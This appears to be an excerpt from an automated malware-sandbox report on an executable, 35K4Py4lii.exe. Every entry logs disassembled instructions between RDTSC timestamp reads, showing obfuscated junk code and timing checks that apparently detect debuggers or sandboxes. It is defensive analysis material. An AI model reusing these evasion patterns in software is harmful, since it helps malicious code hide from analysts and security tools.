      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2C3ED2 second address: 2C3EE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4591E837Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2C5E88 second address: 2C5EB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007FA458C36916h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 js 00007FA458C36916h 0x0000001b jmp 00007FA458C36925h 0x00000020 popad 0x00000021 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2C4FBC second address: 2C4FC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2C4FC0 second address: 2C4FC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2C4FC4 second address: 2C4FD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2C60BE second address: 2C60D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FA458C36916h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007FA458C36916h 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2C6EA4 second address: 2C6EAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2C6EAE second address: 2C6EB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2C5068 second address: 2C506C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2C506C second address: 2C5072 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2C6FEA second address: 2C7011 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4591E837Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jnl 00007FA4591E8376h 0x00000012 jc 00007FA4591E8376h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2C7E79 second address: 2C7F02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FA458C36916h 0x00000009 jns 00007FA458C36916h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 jmp 00007FA458C3691Fh 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c call 00007FA458C36918h 0x00000021 pop eax 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 add dword ptr [esp+04h], 00000016h 0x0000002e inc eax 0x0000002f push eax 0x00000030 ret 0x00000031 pop eax 0x00000032 ret 0x00000033 mov dword ptr [ebp+122D1A69h], edx 0x00000039 push 00000000h 0x0000003b mov edi, 59C04A4Fh 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push ebx 0x00000045 call 00007FA458C36918h 0x0000004a pop ebx 0x0000004b mov dword ptr [esp+04h], ebx 0x0000004f add dword ptr [esp+04h], 00000015h 0x00000057 inc ebx 0x00000058 push ebx 0x00000059 ret 0x0000005a pop ebx 0x0000005b ret 0x0000005c mov edi, dword ptr [ebp+1246D3D2h] 0x00000062 mov edi, 6B5B9A73h 0x00000067 push eax 0x00000068 pushad 0x00000069 jnl 00007FA458C3691Ch 0x0000006f push esi 0x00000070 push eax 0x00000071 push edx 0x00000072 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2C7011 second address: 2C7015 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2C7015 second address: 2C70BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007FA458C36918h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 mov bx, 218Dh 0x00000026 push dword ptr fs:[00000000h] 0x0000002d mov dword ptr [ebp+122D1FDBh], ecx 0x00000033 mov dword ptr fs:[00000000h], esp 0x0000003a mov edi, 4128A518h 0x0000003f mov eax, dword ptr [ebp+122D14E5h] 0x00000045 push 00000000h 0x00000047 push edi 0x00000048 call 00007FA458C36918h 0x0000004d pop edi 0x0000004e mov dword ptr [esp+04h], edi 0x00000052 add dword ptr [esp+04h], 0000001Dh 0x0000005a inc edi 0x0000005b push edi 0x0000005c ret 0x0000005d pop edi 0x0000005e ret 0x0000005f jmp 00007FA458C36922h 0x00000064 push FFFFFFFFh 0x00000066 mov dword ptr [ebp+1245495Ah], esi 0x0000006c nop 0x0000006d jg 00007FA458C36924h 0x00000073 push eax 0x00000074 pushad 0x00000075 push eax 0x00000076 push edx 0x00000077 pushad 0x00000078 popad 0x00000079 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2C8DFE second address: 2C8E2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4591E8387h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA4591E8381h 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2C80C3 second address: 2C80CD instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA458C36916h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2C8E2F second address: 2C8E40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4591E837Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2C8E40 second address: 2C8EC8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FA458C36929h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007FA458C36929h 0x00000011 push 00000000h 0x00000013 mov dword ptr [ebp+122D1AC1h], esi 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push edx 0x0000001e call 00007FA458C36918h 0x00000023 pop edx 0x00000024 mov dword ptr [esp+04h], edx 0x00000028 add dword ptr [esp+04h], 00000016h 0x00000030 inc edx 0x00000031 push edx 0x00000032 ret 0x00000033 pop edx 0x00000034 ret 0x00000035 mov bl, 4Ah 0x00000037 jg 00007FA458C3692Fh 0x0000003d xchg eax, esi 0x0000003e push ebx 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2C8EC8 second address: 2C8ECC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2C9092 second address: 2C909C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA458C36916h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2CAE35 second address: 2CAE39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2CDE32 second address: 2CDE36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2CEF3B second address: 2CEF42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2CEF42 second address: 2CEF47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2D01A8 second address: 2D01B9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jng 00007FA4591E837Eh 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2D01B9 second address: 2D0241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ecx 0x00000009 call 00007FA458C36918h 0x0000000e pop ecx 0x0000000f mov dword ptr [esp+04h], ecx 0x00000013 add dword ptr [esp+04h], 00000017h 0x0000001b inc ecx 0x0000001c push ecx 0x0000001d ret 0x0000001e pop ecx 0x0000001f ret 0x00000020 push dword ptr fs:[00000000h] 0x00000027 push 00000000h 0x00000029 push ecx 0x0000002a call 00007FA458C36918h 0x0000002f pop ecx 0x00000030 mov dword ptr [esp+04h], ecx 0x00000034 add dword ptr [esp+04h], 00000017h 0x0000003c inc ecx 0x0000003d push ecx 0x0000003e ret 0x0000003f pop ecx 0x00000040 ret 0x00000041 mov edi, dword ptr [ebp+122D2D2Fh] 0x00000047 mov dword ptr fs:[00000000h], esp 0x0000004e add dword ptr [ebp+122D1BA3h], edx 0x00000054 mov eax, dword ptr [ebp+122D0A8Dh] 0x0000005a mov bl, F5h 0x0000005c push FFFFFFFFh 0x0000005e jmp 00007FA458C36921h 0x00000063 nop 0x00000064 push eax 0x00000065 push edx 0x00000066 jno 00007FA458C3691Ch 0x0000006c rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2D0241 second address: 2D0247 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2D12E7 second address: 2D12F1 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA458C3691Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2D4486 second address: 2D448A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 27CEB7 second address: 27CEC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2DD3D7 second address: 2DD3DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2DCE2E second address: 2DCE34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2DCF86 second address: 2DCF9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FA4591E837Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2E1307 second address: 2E130C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2E130C second address: 2E1321 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA4591E8380h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2E1321 second address: 2E132E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2E132E second address: 2E1345 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FA4591E837Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2E6DE0 second address: 2E6DE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2E6DE4 second address: 2E6DF8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FA4591E8382h 0x0000000c jng 00007FA4591E8376h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2E6F6B second address: 2E6F70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2E6F70 second address: 2E6F9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4591E8385h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA4591E8381h 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2E6F9D second address: 2E6FA7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA458C36916h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2E7286 second address: 2E728A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2E728A second address: 2E7299 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA458C36916h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2E7299 second address: 2E729F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2EFCB6 second address: 2EFCE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA458C36926h 0x00000009 jmp 00007FA458C3691Bh 0x0000000e popad 0x0000000f pop ecx 0x00000010 push edx 0x00000011 jnc 00007FA458C3691Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2EE984 second address: 2EE98A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2EEDD1 second address: 2EEDF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA458C3691Ch 0x00000007 pushad 0x00000008 jmp 00007FA458C36920h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2EEF90 second address: 2EEF9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2EEF9A second address: 2EEFC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA458C36920h 0x00000009 pushad 0x0000000a popad 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FA458C3691Bh 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2EF2A9 second address: 2EF2B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2EF2B2 second address: 2EF2F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jg 00007FA458C36943h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2EF2F0 second address: 2EF30C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA4591E8388h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2EF486 second address: 2EF48A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2EFB37 second address: 2EFB3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2EFB3D second address: 2EFB5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007FA458C3691Dh 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jnl 00007FA458C36916h 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2EE3DE second address: 2EE3E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2EE3E2 second address: 2EE3FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA458C36922h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2EE3FC second address: 2EE400 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2EE400 second address: 2EE416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FA458C36918h 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jno 00007FA458C36916h 0x00000016 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2F4C16 second address: 2F4C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 jmp 00007FA4591E8380h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2F4C30 second address: 2F4C3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FA458C36916h 0x0000000a popad 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2F551D second address: 2F5521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2F57F5 second address: 2F57F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2FC732 second address: 2FC736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2FC736 second address: 2FC748 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA458C36916h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jno 00007FA458C36916h 0x00000011 pop edi 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2FC748 second address: 2FC758 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA4591E837Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2FC758 second address: 2FC75C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2FC75C second address: 2FC782 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FA4591E837Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push ebx 0x0000000f jns 00007FA4591E8376h 0x00000015 js 00007FA4591E8376h 0x0000001b pop ebx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2BFF87 second address: 2BFF92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2BFF92 second address: 2BFF96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2BFF96 second address: 29E692 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007FA458C36918h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 lea eax, dword ptr [ebp+1248AC82h] 0x00000028 mov edx, ebx 0x0000002a mov edx, dword ptr [ebp+1247C25Dh] 0x00000030 nop 0x00000031 jmp 00007FA458C36929h 0x00000036 push eax 0x00000037 jmp 00007FA458C3691Bh 0x0000003c nop 0x0000003d jng 00007FA458C36926h 0x00000043 jmp 00007FA458C36920h 0x00000048 call dword ptr [ebp+122D1A3Eh] 0x0000004e push edx 0x0000004f jg 00007FA458C3691Eh 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 popad 0x00000059 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2C00CB second address: 2C00E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA4591E8388h 0x00000009 popad 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2C00E8 second address: 2C00EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2C00EE second address: 2C00F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2C0730 second address: 2C0791 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA458C36916h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c jmp 00007FA458C36927h 0x00000011 xchg eax, esi 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007FA458C36918h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 0000001Ch 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c jmp 00007FA458C3691Ch 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 push ebx 0x00000036 pop ebx 0x00000037 ja 00007FA458C36916h 0x0000003d popad 0x0000003e rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2C0E42 second address: 2C0E46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2C0E46 second address: 2C0E4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2C1227 second address: 2C122D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2C12D6 second address: 2C12F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA458C36929h 0x00000009 popad 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2FCE06 second address: 2FCE0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
